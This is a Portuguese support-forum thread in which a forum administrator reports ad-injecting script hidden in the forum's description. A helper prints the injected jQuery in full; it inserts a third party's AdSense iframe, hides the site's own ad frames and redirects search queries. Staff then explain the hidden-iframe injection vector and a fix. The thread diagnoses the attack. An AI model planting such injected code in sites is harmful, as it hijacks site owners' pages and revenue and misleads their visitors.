Problema de segurança no Painel de Controle

Detalhes da dúvida

Versão do fórum : Invision
Nível de acesso : Administrador
Navegador usado : Google Chrome
Imagem :

Imagem da minha dúvida:

Membros afetados : Todos os membros que não fossem administrador
Problema começou : Não sei dizer, porque o problema só ocorria com os membros
Endereço do fórum : http://www.aldeiarpg.com

Descrição do problema

Bom, há pouco tempo eu descobri que alguém, de alguma forma, inseriu um código na descrição do meu fórum. Tal código fazia com que todo e qualquer usuário, exceto administradores, visualizassem propagandas indesejadas. Até onde eu sei, só administradores podem ter acesso ao Painel de Controle e como não fui eu... quem foi? Não há outros administradores no fórum.

Esse código estava escondido embaixo da primeira linha da descrição que estava "vazia" (só com espaços).

Eu queria respostas sobre porque isso ocorreu, ou pelo menos, como eu faço pra evitar, já que é uma falha de segurança no painel que me deixa desconfortável.

@Valentine

O código que é executado é o mesmo (com pequenas diferenças) que eu publiquei neste outro tópico: https://ajuda.forumeiros.com/t97890-tentativas-de-hacker-o-forum-por-mp#671793

Abaixo o código usado em seu fórum:

Código:


function testedeadd() {

   if (jQuery('#main-content').length) {
      phpbb = '#main-content'
   };

   if (jQuery('#' + numaleat).length === 0) {

      jQuery(phpbb).eq(0).prepend('<div style="margin:0 auto;text-align:center"><iframe style=width:728px!important;height:90px!important;overflow:hidden!important frameborder=0 id=' + numaleat + '></iframe></div>');

      ifrm = jQuery('#' + numaleat)[0];
      ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
      ifrm.document.open();
      ifrm.document.write('<style>body{margin:0px}</style><script>google_ad_client=\x22pub-4591355146850004\x22;google_ad_slot=\x221666688237\x22;google_ad_width=728;google_ad_height=90</script><script src=http://pagead2.googlesyndication.com/pagead/show_ads.js></script>');
      ifrm.document.close();

   };

   linkstyle = 'style[type="text/css"]:contains("html body iframe[name="google_ads_frame"]"):contains("display:block")';
   if (jQuery(linkstyle).length) {
      jQuery(linkstyle).eq(0).html(jQuery(linkstyle).eq(0).html().replace(/display:block/g, 'display:none'))
   };

   if (jQuery('#fa_ticker_block').css('display') != 'none') {
      jQuery('#fa_ticker_block').css('display', 'none')
   };

};

if (_userdata.user_level != '1' && typeof repeatstop56364765 === 'undefined') {

   repeatstop56364765 = 'a';
   numaleat = parseInt(1000000) + Math.floor(Math.random() * 9999999 - 1000000);
   phpbb = 'table.bodylinewidth td.bodyline #page-body table[cellspacing="0"][cellpadding="0"][width="100%"] tbody tr td[valign="top"][width="100%"]';

   jQuery(document).ready(function() {
      if (typeof testedeaddfdgd === 'undefined') {
         testedeaddfdgd = 'a';
         testedeadd()
      }
   });

   if (typeof testedeaddfdgd === 'undefined') {
      testedeaddfdgd = 'a';
      setInterval1 = setInterval(function() {
         testedeadd()
      }, 1)
   };

   window.onload = function() {
      if (typeof setInterval1 !== undefined) {
         clearInterval(setInterval1)
      }
   };

   jQuery('form[action^="/search"] input[type="submit"]').live('mousedown', function() {
      window.open('http://google.com/cse?cx=partner-pub-4591355146850004:5829051292&q=' + encodeURIComponent('site:' + location.hostname + ' ' + jQuery(this).closest('form').find('input[name="search_keywords"]').val()));
      return false
   });
   jQuery('form[action^="/search"] input[name="search_keywords"]').live('keypress', function(e) {
      if (e.which == 13) {
         window.open('http://google.com/cse?cx=partner-pub-4591355146850004:5829051292&q=' + encodeURIComponent('site:' + location.hostname + ' ' + jQuery(this).val()));
         return false
      }
   });

};

jQuery('script[src="//xmlfeed2.6te.net/s"]').remove();


Note que o host é o mesmo: xmlfeed2.6te.net/s

Vamos aguardar os administradores se prontificarem aqui e/ou no tópico que mencionei acima!

JS

Olá Valentine,

Devido a um iframe oculto nas mensagens ou Mensagens Privadas, um código script era adicionado à descrição do fórum, fazendo com que as publicidades aparecessem, mesmo que tenha assinalado ou pago para que isso aconteça.

Uma alteração ao nível dos códigos foi realizada hoje pelos técnicos nos fóruns Forumeiros de forma a que isso não volte a acontecer.


Agradecemos a sua colaboração e pedimos desculpas pelos inconvenientes causados.
Até mais.

Tópico movido de 'Questões sobre JavaScript & jQuery' para 'Necessidade de técnico'

Se já foram tomadas as providências, então podem fechar o tópico.

Obrigado.